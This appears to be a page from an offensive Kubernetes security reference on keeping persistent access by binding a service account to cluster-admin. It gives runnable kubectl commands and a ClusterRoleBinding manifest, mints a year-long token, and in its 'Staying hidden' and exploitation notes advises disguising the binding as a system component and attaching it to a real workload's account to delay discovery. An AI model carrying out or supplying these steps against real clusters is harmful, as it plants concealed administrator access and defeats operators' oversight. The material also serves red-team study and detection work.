The most durable Kubernetes persistence is an RBAC grant to an identity the attacker controls. A token can be rotated and a pod deleted, but a ClusterRoleBinding that gives a service account cluster-admin stays in effect until an operator finds and deletes it, and it keeps working no matter how often the underlying token is reissued because the binding, not the token, carries the authority. The attacker creates a service account (or reuses an existing innocuous one) and binds it to a powerful role.
Requires rights to create bindings (or the bind/escalate verbs):
kubectl auth can-i create clusterrolebindings
Plant the binding#
# a service account that blends in, in a busy namespace
kubectl create serviceaccount monitoring -n kube-system 2>/dev/null
# bind it to cluster-admin
cat <<YAML | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata: { name: system:monitoring-metrics } # a name that looks built-in
roleRef: { apiGroup: rbac.authorization.k8s.io, kind: ClusterRole, name: cluster-admin }
subjects:
- { kind: ServiceAccount, name: monitoring, namespace: kube-system }
YAML
# mint a token for it whenever needed
kubectl create token monitoring -n kube-system --duration=8760h
Staying hidden#
# name the binding and SA to resemble system components (system:*, *-metrics)
# prefer binding an EXISTING service account used by a real workload, so the
# subject looks legitimate and deleting it would break that workload
kubectl get clusterrolebindings | grep -iE 'admin|system' # see what blends in
Exploitation notes#
- Binding to the pre-existing
cluster-adminrole is cleanest and needs only the ability to create a ClusterRoleBinding (plusbindif anti-escalation applies); see Escalate and bind verbs. - Naming the binding and service account to mimic system components (
system:...,...-metrics,...-controller) delays discovery, as does attaching the grant to a service account a real workload already uses. - A bound identity plus on-demand
kubectl create tokengives renewable access without storing a token anywhere; a client certificate from CSR approval is an alternative that survives even binding deletion until CA rotation.